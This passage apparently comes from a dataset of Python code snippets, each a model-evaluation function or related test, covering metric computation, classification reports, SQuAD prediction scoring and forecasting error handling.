'HA': ['final'],\n 'GBT': ['final']\n }\n else:\n m = cfg.model.name\n year = cfg.datasource.test_year\n\n # find all experiments available for this model, datasource and test year\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{year}')\n models = {\n m : [ f.name for f in os.scandir(result_dir) if f.is_dir() ]\n }\n\n\n # thresholds for binary classification metrics\n if cfg.datasource.name == 'abm':\n thresholds = [0.0019, 0.0207]\n else:\n thresholds = [0, 10, 20]\n\n rmse_per_hour = []\n mae_per_hour = []\n pcc_per_hour = []\n bin_per_hour = []\n\n rmse_per_night = []\n mae_per_night = []\n\n output_dir = osp.join(base_dir, 'results', datasource, f'performance_evaluation{ext}', experiments)\n os.makedirs(output_dir, exist_ok=True)\n\n counter = 0\n\n for m, dirs in models.items():\n print(f'evaluate {m}')\n\n for d in dirs:\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{cfg.datasource.test_year}', d)\n\n # check if directory exists\n if os.path.isdir(result_dir):\n results, model_cfg = load_cv_results(result_dir, trials=cfg.task.repeats, ext=ext)\n\n df_prep = pd.read_csv(osp.join(base_dir, 'data', 'preprocessed',\n f'{model_cfg[\"t_unit\"]}_{model_cfg[\"model\"][\"edge_type\"]}_ndummy={model_cfg[\"datasource\"][\"n_dummy_radars\"]}',\n datasource, cfg.season, str(cfg.datasource.test_year), 'dynamic_features.csv'))\n tidx2night = dict(zip(df_prep.tidx, df_prep.nightID))\n\n rmse_per_hour.append(compute_rmse(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n mae_per_hour.append(compute_mae(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n pcc_per_hour.append(compute_pcc(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n\n if fixed_t0:\n rmse_per_night.append(compute_rmse_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n mae_per_night.append(compute_mae_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n\n # compute binary classification measures\n for thr in thresholds:\n bin_per_hour.append(compute_bin(m, d, results, groupby=['horizon', 'trial'], threshold=thr, km2=True))\n\n counter += 1\n\n else:\n print(f'Experiment \"{d}\" for model \"{m}\" and datasource \"{datasource}\" is not available. '\n f'Use \"run_experiments.py model={m} datasource={datasource} +experiment={d}\" to run this experiment.')\n\n if counter > 0:\n rmse_per_hour = pd.concat(rmse_per_hour)\n rmse_per_hour.to_csv(osp.join(output_dir, f'rmse_per_hour.csv'))\n\n mae_per_hour = pd.concat(mae_per_hour)\n mae_per_hour.to_csv(osp.join(output_dir, f'mae_per_hour.csv'))\n\n pcc_per_hour = pd.concat(pcc_per_hour)\n pcc_per_hour.to_csv(osp.join(output_dir, f'pcc_per_hour.csv'))\n\n bin_per_hour = pd.concat(bin_per_hour)\n bin_per_hour.to_csv(osp.join(output_dir, f'bin_per_hour.csv'))\n\n if fixed_t0:\n rmse_per_night = pd.concat(rmse_per_night)\n rmse_per_night.to_csv(osp.join(output_dir, f'rmse_per_night.csv'))\n\n mae_per_night = pd.concat(mae_per_night)\n mae_per_night.to_csv(osp.join(output_dir, f'mae_per_night.csv'))", "def regression_evaluation(self, test_set, predicted_values):\r\n\r\n MAE = self.mean_absolute_error(test_set, predicted_values)\r\n MSE = self.mean_square_error(test_set, predicted_values)\r\n print(f\"Mean Percent Error:\\t{MAE:.2f}\")\r\n print(f\"Mean Square Error:\\t{MSE:.2f}\")", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def _check_evaluate_implementation(self) -> None:\n logging.debug(f\"Evaluate_batch_defined: {self._evaluate_batch_defined()}.\")\n logging.debug(f\"Evaluate full dataset defined: {self._evaluate_full_dataset_defined()}.\")\n check.not_eq(\n self._evaluate_batch_defined(),\n self._evaluate_full_dataset_defined(),\n \"Please define exactly one of: `evaluate_batch()` or `evaluate_full_dataset()`. \"\n \"For most use cases `evaluate_batch()` is recommended is recommended because \"\n \"it can be parallelized across all devices.\",\n )", "def evaluate(self, data, metric, classes=None):\n func_dict = {\n 'mutual_information': sklearn.metrics.mutual_info_score,\n 'normed_mutual_information': sklearn.metrics.normalized_mutual_info_score,\n 'square_error': sklearn.metrics.mean_squared_error,\n 't-test': scipy.stats.ttest_ind,\n 'wilcoxon': scipy.stats.wilcoxon,\n 'correlation': np.corrcoef\n }\n self.make_signature(data, classes)\n try:\n if metric in {'mutual_information', 'normed_mutual_information'}:\n self.score = func_dict[metric](classes, self.digit_signature()) \n elif metric == 'square_error':\n self.score = func_dict[metric](classes, self.signatures)\n elif metric in {'t-test', 'wilcoxon'} :\n self.score = np.abs(func_dict[metric](self.signatures[classes==1], \\\n self.signatures[classes==0])[0])\n \n elif metric == 'correlation':\n self.score = func_dict[metric](classes, self.signatures)[1,0]\n \n except: KeyError(\"no such a function\") \n \n return self.score", "def evaluate(self):\n raise Exception(\"Not implemented.\")", "def validate(\n self,\n val_data=None,\n print_report=True,\n save_path=\"ktrain_classification_report.csv\",\n class_names=[],\n ):\n if val_data is not None:\n val = val_data\n else:\n val = self.val_data\n\n classification, multilabel = U.is_classifier(self.model)\n if not classification:\n # warnings.warn('learner.validate is only for classification problems. '\n #'For regression, etc., use learner.predict and learner.ground_truth '\n #'to manually validate.')\n # return\n pass\n is_multilabel = U.is_multilabel(val) or multilabel\n y_pred = self.predict(val_data=val)\n y_true = self.ground_truth(val_data=val)\n y_pred = np.squeeze(y_pred)\n y_true = np.squeeze(y_true)\n\n # regression evaluation\n if not classification:\n from sklearn.metrics import mean_absolute_error, mean_squared_error\n\n regout = []\n metrics = U.metrics_from_model(self.model)\n for m in metrics:\n if m in [\"mae\", \"mean_absolute_error\"]:\n regout.append((m, mean_absolute_error(y_true, y_pred)))\n elif m in [\"mse\", \"mean_squared_error\"]:\n regout.append((m, mean_squared_error(y_true, y_pred)))\n if not regout:\n warnings.warn(\n \"%s is not supported by validate/evaluate - falling back to MAE\"\n )\n regout.append((\"mae\", mean_absolute_error(y_true, y_pred)))\n return regout\n\n if len(y_pred.shape) == 1:\n y_pred = np.where(y_pred > 0.5, 1, 0)\n y_true = np.where(y_true > 0.5, 1, 0)\n elif is_multilabel:\n from sklearn.preprocessing import binarize\n\n y_pred = binarize(y_pred, threshold=0.5)\n else:\n y_pred = np.argmax(y_pred, axis=1)\n y_true = np.argmax(y_true, axis=1)\n\n if print_report or save_path is not None:\n if class_names:\n try:\n class_names = [str(s) for s in class_names]\n except:\n pass\n report = classification_report(\n y_true,\n y_pred,\n target_names=class_names,\n output_dict=not print_report,\n )\n else:\n report = classification_report(\n y_true,\n y_pred,\n output_dict=not print_report,\n zero_division=0,\n )\n if print_report:\n print(report)\n else:\n df = pd.DataFrame(report).transpose()\n df.to_csv(save_path)\n print(\"classification report saved to: %s\" % (save_path))\n cm_func = confusion_matrix\n if is_multilabel:\n warnings.warn(\n \"Confusion matrices do not currently support multilabel classification, so returning None\"\n )\n return\n\n cm = confusion_matrix(y_true, y_pred)\n return cm", "def test_evaluate():\n X_train, X_test, y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def evaluate_print(self, test_data):\n test_results = [(np.argmax(self.feedforward(x)), np.argmax(y)) #argmax 返回最大数的索引\n for (x, y) in test_data]\n #统计预测错误的数据特征\n error = []\n for i, (x, y) in enumerate(test_results):\n if (x!=y):\n error.append(test_data[i][0])\n error = np.insert(error, 0, values=y, axis=1) #将正确答案插入第一行\n right = sum(int(x == y) for (x, y) in test_results)\n #打印出用全部测试集进行测试得到的结果\n print( \"TrainTest : {0} / {1} = {2}\".format(\n right, len(test_data), round(right/len(test_data),6) ))\n return error", "def evaluate(self):\r\n raise Exception(\"Not implemented.\")", "def eval_n_verify(yaml_data, dry_run, fail_eval):\n print('='*10, 'Verifying Results', '='*10)\n try:\n for model in yaml_data['models']:\n for i, topic in enumerate(yaml_data['topics']):\n for eval in yaml_data['evals']:\n eval_cmd = [\n os.path.join(yaml_data['root'], eval['command']),\n ' '.join(eval['params']) if eval['params'] else '',\n os.path.join(yaml_data['root'], yaml_data['qrels_root'], topic['qrel']),\n 'run.{0}.{1}.{2}'.format(yaml_data['name'], model['name'], topic['path'])\n ]\n if dry_run:\n print(' '.join(eval_cmd))\n continue\n\n out = [line for line in check_output(' '.join(eval_cmd)).decode('utf-8').split('\\n') if line.strip()][-1]\n if not out.strip():\n continue\n eval_out = out.strip().split(eval['separator'])[eval['parse_index']]\n expected = round(model['results'][eval['metric']][i], eval['metric_precision'])\n real = round(float(eval_out), eval['metric_precision'])\n if isclose(expected, real):\n print(OKBLUE, '[OK]', yaml_data['name'], model['name'], topic['name'], eval['metric'], expected, real, ENDC)\n else:\n print(FAIL, ['ERROR'], yaml_data['name'], model['name'], topic['name'], eval['metric'], expected, real, '!!!!', ENDC)\n if fail_eval:\n assert False\n finally:\n print(ENDC)", "def evaluate():\n log.info('Loading dev data...')\n if args.version_2:\n dev_data = SQuAD('dev', version='2.0')\n else:\n dev_data = SQuAD('dev', version='1.1')\n (_, _), (data_file_name, _) \\\n = dev_data._data_file[dev_data._version][dev_data._segment]\n dev_data_path = os.path.join(dev_data._root, data_file_name)\n\n if args.debug:\n sampled_data = [dev_data[0], dev_data[1], dev_data[2]]\n dev_data = mx.gluon.data.SimpleDataset(sampled_data)\n log.info('Number of records in dev data: %d', len(dev_data))\n\n dev_data_features = preprocess_dataset(\n tokenizer, dev_data, vocab=vocab, max_seq_length=args.max_seq_length,\n doc_stride=args.doc_stride, num_workers=args.num_workers,\n max_query_length=args.max_query_length, load_from_pickle=args.load_pickle,\n feature_file=args.dev_dataset_file)\n\n dev_data_input = convert_full_features_to_input_features(dev_data_features)\n log.info('The number of examples after preprocessing: %d', len(dev_data_input))\n\n dev_dataloader = mx.gluon.data.DataLoader(dev_data_input, batchify_fn=batchify_fn,\n num_workers=4, batch_size=args.test_batch_size,\n shuffle=False, last_batch='keep')\n\n log.info('start prediction')\n\n all_results = collections.defaultdict(list)\n\n epoch_tic = time.time()\n total_num = 0\n for (batch_id, data) in enumerate(dev_dataloader):\n data_list = list(split_and_load(data, ctx))\n for splited_data in data_list:\n example_ids, inputs, token_types, valid_length, p_mask, _, _, _ = splited_data\n total_num += len(inputs)\n outputs = net_eval(inputs, token_types, valid_length, p_mask=p_mask)\n example_ids = example_ids.asnumpy().tolist()\n for c, example_ids in enumerate(example_ids):\n result = RawResultExtended(start_top_log_probs=outputs[0][c].asnumpy().tolist(),\n start_top_index=outputs[1][c].asnumpy().tolist(),\n end_top_log_probs=outputs[2][c].asnumpy().tolist(),\n end_top_index=outputs[3][c].asnumpy().tolist(),\n cls_logits=outputs[4][c].asnumpy().tolist())\n all_results[example_ids].append(result)\n if batch_id % args.log_interval == 0:\n log.info('Batch: %d/%d', batch_id + 1, len(dev_dataloader))\n\n epoch_toc = time.time()\n log.info('Time cost=%2f s, Thoughput=%.2f samples/s', epoch_toc - epoch_tic,\n total_num / (epoch_toc - epoch_tic))\n\n log.info('Get prediction results...')\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n scores_diff_json = collections.OrderedDict()\n for features in dev_data_features:\n results = all_results[features[0].example_id]\n example_qas_id = features[0].qas_id\n score_diff, best_non_null_entry, nbest_json = predict_extended(\n features=features, results=results, n_best_size=args.n_best_size,\n max_answer_length=args.max_answer_length, start_n_top=args.start_top_n,\n end_n_top=args.end_top_n)\n scores_diff_json[example_qas_id] = score_diff\n all_predictions[example_qas_id] = best_non_null_entry\n all_nbest_json[example_qas_id] = nbest_json\n\n output_prediction_file = os.path.join(args.output_dir, 'predictions.json')\n output_nbest_file = os.path.join(args.output_dir, 'nbest_predictions.json')\n output_null_log_odds_file = os.path.join(args.output_dir, 'null_odds.json')\n\n with open(output_prediction_file, 'w') as writer:\n writer.write(json.dumps(all_predictions, indent=4) + '\\n')\n with open(output_nbest_file, 'w') as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + '\\n')\n with open(output_null_log_odds_file, 'w') as writer:\n writer.write(json.dumps(scores_diff_json, indent=4) + '\\n')\n\n if os.path.exists(sys.path[0] + '/evaluate-v2.0.py'):\n arguments = [\n dev_data_path, output_prediction_file, '--na-prob-thresh',\n str(args.null_score_diff_threshold)\n ]\n if args.version_2:\n arguments += ['--na-prob-file', output_null_log_odds_file]\n subprocess.call([sys.executable, sys.path[0] + '/evaluate-v2.0.py'] + arguments)\n else:\n log.info('Please download evaluate-v2.0.py to get evaluation results for SQuAD. '\n 'Check index.rst for the detail.')", "def evaluate(model, eval_data, num_labels): \n # Turn on the evaluation state to ignore dropouts\n model.eval()\n results = [predict(model, x) for x, y in eval_data]\n f1_score, accuracy = get_metrics(np.array([y for x, y in eval_data]), results, num_labels)\n return f1_score, accuracy", "def evaluate(self):\n\n\t\t## We should be evaluating on dev dataset as well, so commenting x_test\n\t\t#self.model_score = self.model.evaluate(self.x_test, self.y_test_oh, batch_size=2048)\n\t\tself.model_score = self.model.evaluate(self.x_dev, self.y_dev_oh, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\n\t\t##Saving atucal vs predicted predictions\n\t\t##np.argmax returns the index where it see's 1 in the row\n\t\t#y_pred = np.argmax(self.model.predict(self.x_test, batch_size=2048), axis=1)\n\t\ty_pred = np.argmax(self.model.predict(self.x_dev, batch_size=2048), axis=1)\n\n\t\t## vstack will stack them in 2 rows, so we use Trasnpose to get them in column stack\n\t\t#output_predict = np.vstack((np.argmax(self.y_test_oh, axis=1), y_pred)).T\n\t\toutput_predict = np.vstack((np.argmax(self.y_dev_oh, axis=1), y_pred)).T\n\t\toutputFile = self.resultDir + \"/outputPredict.csv\" \n\t\tnp.savetxt(outputFile, output_predict, fmt=\"%5.0f\", delimiter=\",\")\n\n\t\t##Error Analysis of the prediction\n\t\terrorAnalysis(outputFile)\n\n\t\treturn self.model_score", "def _evaluate(self):\n logging.warning('-> evaluate EMPTY experiment...')", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def test_evaluate_model(sequential_model, model_data):\n _, _, _, _, x_test, y_test = model_data\n compile_model(sequential_model)\n output = evaluate_model(sequential_model, x_test, y_test, 64)\n assert len(output) == 2", "def evaluate(self, dataset):\n return self.model.evaluate(dataset.X_val, dataset.y_val)", "def evaluate(self):\n\n rew_rl = []\n for ckpt_path in self._config.eval_ckpt_paths:\n self._load_ckpt(ckpt_path, self._config.ckpt_num)\n\n logger.info(\n \"Run %d evaluations for %d environments\",\n self._config.num_eval,\n len(self._envs),\n )\n rollouts, info = self._evaluate(record_video=self._config.record_video)\n\n info_stat = info.get_stat()\n\n rew_rl.append(np.mean(info[\"rew_rl\"]))\n\n logger.info(\"All Eval Rew Values: %s\", rew_rl)\n logger.info(\"Eval Rew RL Average: %f, Std: %f\", np.mean(rew_rl), np.std(rew_rl))\n\n os.makedirs(\"result\", exist_ok=True)\n with h5py.File(\"result/{}.hdf5\".format(self._config.run_name), \"w\") as hf:\n for k, v in info.items():\n hf.create_dataset(k, data=info[k])\n with open(\"result/{}.txt\".format(self._config.run_name), \"w\") as f:\n for k, v in info_stat.items():\n f.write(\"{}\\t{:.03f} $\\\\pm$ {:.03f}\\n\".format(k, v[0], v[1]))", "def evaluate(env, X_data, y_data, batch_size=1):\n print('\\nEvaluating')\n n_sample = X_data.shape[0]\n n_batch = int((n_sample+batch_size-1) / batch_size)\n loss, acc = 0, 0\n for batch in range(n_batch):\n print(' batch {0}/{1}'.format(batch + 1, n_batch))\n print('\\r')\n start = batch * batch_size\n end = min(n_sample, start + batch_size)\n cnt = end - start\n batch_loss, batch_acc = env.sess.run(\n [env.loss, env.acc],\n feed_dict={env.x: X_data[start:end],\n env.y: y_data[start:end]})\n loss += batch_loss * cnt\n acc += batch_acc * cnt\n loss /= n_sample\n acc /= n_sample\n print(' loss: {0:.4f} acc: {1:.4f}'.format(loss, acc))\n return loss, acc", "def error_analyze(\n self,\n data_dir: Path,\n processed_data_dir: Path,\n result_dir: Path,\n output_report_dir: Path,\n ) -> NoReturn:\n pass", "def evaluate_model(model, X_train, y_train, X_test, y_test):\n model = model\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n\n report = classificationreport(y_test, y_pred, target_names= [\"0\", \"1\"], output_dict=True)\n\n return report", "def evaluate(self):\n # Method variables definition\n X_train, X_test, y_train, y_test = dm.reshape_y_set_split_data(self.datasetManager)\n featureScaleDependentVariables = self.datasetManager.params.featureScaleDependentVariables\n\n # Feature Scaling\n X_scaler, X_train = dm.do_feature_scaling(X_train)\n if featureScaleDependentVariables:\n y_scaler, y_train = dm.do_feature_scaling(y_train)\n else:\n y_scaler = None\n y_train = self.datasetManager.y_train\n \n self.X_scaler = X_scaler\n self.y_scaler = y_scaler\n\n # Training the SVR model on the training set\n regressor = SVR(kernel = 'rbf')\n regressor.fit(X_train, y_train.ravel())\n self.regressor = regressor\n\n # Predicting the Test set results\n self.y_pred = y_scaler.inverse_transform(regressor.predict(X_scaler.transform(X_test))) if featureScaleDependentVariables else regressor.predict(X_test)\n \n # Returning the process result : the regression type and the predicted dependent variables set\n return [\"Support Vector Regression\", self.get_r2_score(y_test, self.y_pred)]", "def evaluate(self):\n raise NotImplementedError()", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def evaluate(self):\n predictions = self.model.predict(self.test[0])\n accuracy = accuracy_score(self.test[1], predictions)\n print(\"Accuracy:\", str(accuracy * 100) + \"%\")\n self.plot_results(predictions)", "def test_evaluate_error_score(error_score, return_data, strategy, backend):\n # skip test for dask backend if dask is not installed\n if backend == \"dask\" and not _check_soft_dependencies(\"dask\", severity=\"none\"):\n return None\n\n forecaster = ExponentialSmoothing(sp=12)\n y = load_airline()\n # add NaN to make ExponentialSmoothing fail\n y.iloc[1] = np.nan\n fh = [1, 2, 3]\n cv = ExpandingWindowSplitter(step_length=48, initial_window=12, fh=fh)\n if error_score in [np.nan, 1000]:\n with pytest.warns(FitFailedWarning):\n results = evaluate(\n forecaster=forecaster,\n y=y,\n cv=cv,\n return_data=return_data,\n error_score=error_score,\n strategy=strategy,\n backend=backend,\n )\n if isinstance(error_score, type(np.nan)):\n assert results[\"test_MeanAbsolutePercentageError\"].isna().sum() > 0\n if error_score == 1000:\n assert results[\"test_MeanAbsolutePercentageError\"].max() == 1000\n if error_score == \"raise\":\n with pytest.raises(Exception): # noqa: B017\n evaluate(\n forecaster=forecaster,\n y=y,\n cv=cv,\n return_data=return_data,\n error_score=error_score,\n strategy=strategy,\n )", "def error_analysis(predictions, gold, result_collector):\n # scores = defaultdict(list)\n for iteration_id, texts in predictions.items():\n # map iteration id to fold\n fold = str(int(iteration_id) / 5)\n for tid, pred_tree in texts.items():\n gold_tree = gold[tid]\n print(iteration_id, fold, tid)\n print(gold_tree.get_triples())\n print(pred_tree.get_triples())\n for level, scores in eval_prediction([gold_tree], [pred_tree]):\n result_collector.add_result(tid, fold, level, scores)\n print(\"Done.\")", "def evaluate_model(self, predictions, expected, bypass_data_to_eval):\n\n result = []\n for i, unique_id in enumerate(np.squeeze(expected[\"unique_ids\"])):\n start_logits = predictions['tf_electra_for_question_answering'][i]\n start_top_index = predictions['tf_electra_for_question_answering_1'\n ][i]\n end_logits = predictions['tf_electra_for_question_answering_2'][i]\n end_top_index = predictions['tf_electra_for_question_answering_3'][i\n ]\n cls_logits = predictions['tf_electra_for_question_answering_4'][i]\n\n result.append(\n SquadResult(\n unique_id,\n start_logits.tolist(),\n end_logits.tolist(),\n start_top_index=start_top_index.tolist(),\n end_top_index=end_top_index.tolist(),\n cls_logits=cls_logits.tolist(),\n )\n )\n\n dev_features = bypass_data_to_eval[\"dev_features\"]\n dev_examples = bypass_data_to_eval[\"dev_examples\"]\n\n answers, nbest_answers = get_answers(\n dev_examples, dev_features, result, self._args\n )\n\n output_prediction_file = os.path.join(\n self._args.output_dir, \"predictions.json\"\n )\n output_nbest_file = os.path.join(\n self._args.output_dir, \"nbest_predictions.json\"\n )\n\n with open(output_prediction_file, \"w\") as f:\n f.write(json.dumps(answers, indent=4) + \"\\n\")\n with open(output_nbest_file, \"w\") as f:\n f.write(json.dumps(nbest_answers, indent=4) + \"\\n\")\n\n if self._args.version_2_with_negative:\n dev_file = \"dev-v2.0.json\"\n eval_file = \"evaluate-v2.0.py\"\n else:\n dev_file = \"dev-v1.1.json\"\n eval_file = \"evaluate-v1.1.py\"\n\n command_str = (\n f\"{sys.executable} {os.path.join(self._args.data_dir, eval_file)} \"\n f\"{os.path.join(self._args.data_dir, dev_file)} \"\n f\"{output_prediction_file}\"\n )\n\n logging.debug(f\"\\nExecuting: `{command_str}`\\n\")\n\n eval_out = subprocess.check_output(shlex.split(command_str))\n\n # scores: {'exact_match': 87.06717123935667, 'f1': 92.78048326711645}\n scores = json.loads(eval_out.decode(\"UTF-8\").strip())\n\n logging.debug(\"scores:\", scores)\n\n metric_units = \"f1\"\n\n return scores[metric_units], metric_units", "def evaluate(model, val_data, epoch):\n print('validating')\n\n # 设置为评估模式 \n model.eval() \n\n val_loss = []\n with torch.no_grad():\n DEVICE = config.DEVICE\n\n val_dataloader = DataLoader(dataset=val_data,\n batch_size=config.batch_size,\n shuffle=True,\n pin_memory=True, drop_last=True,\n collate_fn=collate_fn)\n\n for batch, data in enumerate(tqdm(val_dataloader)):\n\n x, y, x_len, y_len, oov, len_oovs = data\n\n if config.is_cuda:\n x = x.to(DEVICE)\n y = y.to(DEVICE)\n x_len = x_len.to(DEVICE)\n len_oovs = len_oovs.to(DEVICE)\n\n loss = model(x, x_len, y, len_oovs, batch=batch, \n num_batches=len(val_dataloader),\n teacher_forcing=True)\n\n val_loss.append(loss.item())\n\n return np.mean(val_loss)", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def test_epe_evaluate(self):\n epe_metric = EPE()\n epe_metric.process(self.data_batch, self.data_samples)\n epe = epe_metric.evaluate(1)\n self.assertAlmostEqual(epe['EPE'], 11.5355339)", "def evaluate(self, epoch, exploration_paths):\n logger.log(\"Collecting samples for evaluation\")\n paths = self._sample_eval_paths(epoch)\n statistics = OrderedDict()\n\n statistics.update(self._statistics_from_paths(paths, \"Test\"))\n statistics.update(self._get_other_statistics())\n statistics.update(self._statistics_from_paths(exploration_paths,\n \"Exploration\"))\n\n statistics['AverageReturn'] = get_average_returns(paths)\n statistics['Epoch'] = epoch\n\n for key, value in statistics.items():\n logger.record_tabular(key, value)\n\n self.log_diagnostics(paths)", "def evaluate(model, data):\n n_targets = 0\n n_correct_predictions = 0\n\n # Set the model on evaluatio mode.\n model.eval()\n\n # Create progress bar.\n progress_bar = tqdm.tqdm(total=len(data),\n unit='batch',\n desc='[evaluate] batch accuracy: 0.000',\n leave=False)\n\n # Loop through validation batches.\n for inputs, targets in data:\n\n # Send data to GPU if CUDA is enabled.\n if next(model.parameters()).is_cuda:\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n # Feed forward.\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n\n # Choose the class with maximum probability.\n _, predictions = torch.max(outputs, 1)\n\n accuracy = (predictions == targets).sum().item() / len(targets)\n progress_bar.update(1)\n progress_bar.set_description(\n '[evaluate] batch accuracy: {accuracy:.3f}'.format(\n accuracy=accuracy))\n\n # Accumulate targets and correct predictions count.\n n_targets += len(targets)\n n_correct_predictions += (predictions == targets).sum().item()\n\n # Close progress bar.\n progress_bar.close()\n\n return n_correct_predictions / n_targets", "def test_evaluation_error():\n folding = Folding(DATASET,\n reset=True)\n\n for fold in folding.fold():\n sjob = SamplingJob(fold,\n OVERSAMPLER,\n OVERSAMPLER_PARAMS)\n\n result = sjob.do_oversampling()\n\n ejob = EvaluationJob(result,\n [('smote_variants.classifiers',\n 'ErrorWarningClassifier',\n {'raise_value_error': True})])\n\n result_eval = ejob.do_evaluation()\n\n assert len(result_eval[0]['error']) > 3\n\n ejob = EvaluationJob(result,\n [('smote_variants.classifiers',\n 'ErrorWarningClassifier',\n {'raise_runtime_error': True})])\n\n result_eval = ejob.do_evaluation()\n\n assert len(result_eval[0]['error']) > 3", "def evaluate(self, data, category):\n n_data = len(data)\n eval_scores = [{} for _ in range(n_data)]\n\n # Calculate average sentence-level scores for factual consistency\n src_list, output_list = [], []\n n_sents = [] # the number of sentences in the claim\n for i in range(n_data):\n source = data[i]['source']\n system_outputs = sent_tokenize(data[i]['system_output'])\n n_sents.append(len(system_outputs))\n for j in range(len(system_outputs)):\n src_list.append(source)\n output_list.append(system_outputs[j])\n input_list = add_question(dimension=self.dim, output=output_list, src=src_list, task=self.task)\n sent_score = self.scorer.score(input_list, self.task, category, self.dim)\n\n # Get average score for each sample\n start_idx = 0\n score = []\n for cur_n_sent in n_sents:\n score.append(sum(sent_score[start_idx:start_idx + cur_n_sent]) / cur_n_sent)\n start_idx += cur_n_sent\n\n for i in range(n_data):\n eval_scores[i][self.dim] = score[i]\n\n return eval_scores", "def evaluate(self, session, *args, evaluate_data_iterator=None, **kwargs):\n\n raise NotImplementedError(\"Implement evaluate() method\")", "def evaluate(exe, metric, loss, correct, dev_program, data_loader,\n phase=\"eval\"):\n metric.reset()\n returns = [loss]\n if isinstance(correct, list) or isinstance(correct, tuple):\n returns.extend(list(correct))\n else:\n returns.append(correct)\n for batch in data_loader:\n exe.run(dev_program, feed=batch, \\\n fetch_list=returns)\n return_numpys = exe.run(dev_program, feed=batch, \\\n fetch_list=returns)\n metric_numpy = return_numpys[1] if len(return_numpys[\n 1:]) == 1 else return_numpys[1:]\n metric.update(metric_numpy)\n res = metric.accumulate()\n if isinstance(metric, Mcc):\n print(\"%s loss: %f, mcc: %s\" % (phase, return_numpys[0], res[0]))\n elif isinstance(metric, PearsonAndSpearman):\n print(\"%s loss: %f, pearson: %s, spearman: %s, pearson and spearman: %s\"\n % (phase, return_numpys[0], res[0], res[1], res[2]))\n else:\n print(\"%s loss: %f, acc: %s, \" % (phase, return_numpys[0], res))", "def evaluate(self):\n try:\n self._evaluate()\n except Exception as e:\n if str(e) == \"assignment destination is read-only\":\n log.exception(\n \"Encountered error during scenario evaluation. Be sure \"\n + \"that the classifier's predict() isn't directly modifying the \"\n + \"input variable itself, as this can cause unexpected behavior in ART.\"\n )\n else:\n log.exception(\"Encountered error during scenario evaluation.\")\n sys.exit(1)\n\n if self.results is None:\n log.warning(f\"{self._evaluate} did not set self.results to a dict\")\n\n self.save()", "def evaluate(self, X_test, y_test):\n y_pred_train = self.pipeline.predict(self.X)\n mse_train = mean_squared_error(self.y, y_pred_train)\n rmse_train = np.sqrt(mse_train)\n \n self.mlflow_log_metric('rmse_train', rmse_train)\n \n y_pred_test = self.pipeline.predict(X_test)\n mse_test = mean_squared_error(y_test, y_pred_test)\n rmse_test = np.sqrt(mse_test)\n self.mlflow_log_metric('rmse_test', rmse_test)\n \n return (round(rmse_train, 3) ,round(rmse_test, 3))", "def evaluate(self, data, label_indices, evaluator=np.argmax):\n\n assert(len(data) == len(label_indices))\n\n assert(len(data) == len(label_indices))\n assert(data[0].shape == (self.sizes[0], 1))\n for idx in label_indices:\n assert(idx >= 0 and idx < self.sizes[-1])\n\n results = [(evaluator(self.feedforward(x)), y)\n for (x, y) in zip(data, label_indices)]\n\n num = len(data)\n num_correct = sum(int(x == y) for (x, y) in results)\n num_incorrect = num - num_correct\n accuracy = num_correct / num\n\n return {'num_testing': len(data),\n 'num_correct': num_correct,\n 'num_incorrect': num_incorrect,\n 'accuracy': accuracy}", "def _evaluate(self,\n logits,\n predictions,\n data, evaluation_fn,\n max_eval_batches=None,\n calculate_scores=True,\n write_results=False):\n # counting the evaluation batches\n num_eval_batches = 0\n # logits and predictions from the model\n all_logits = []\n all_predictions = []\n # fetched data that led to the predictions\n # dictionary of {seq_1: [], seq_2: [], target: []}\n all_fetched_data = collections.defaultdict(list)\n try:\n while True:\n # sample predictions\n (fetched_logits,\n fetched_predictions,\n fetched_data) = self._fetch_data_batch(\n logits=logits, predictions=predictions, data=data)\n\n # Cache the data\n all_logits += fetched_logits\n all_predictions += fetched_predictions\n all_fetched_data[\"target\"] += fetched_data[\"target\"]\n\n # break the loop if max_eval_batches is set\n num_eval_batches += 1\n if 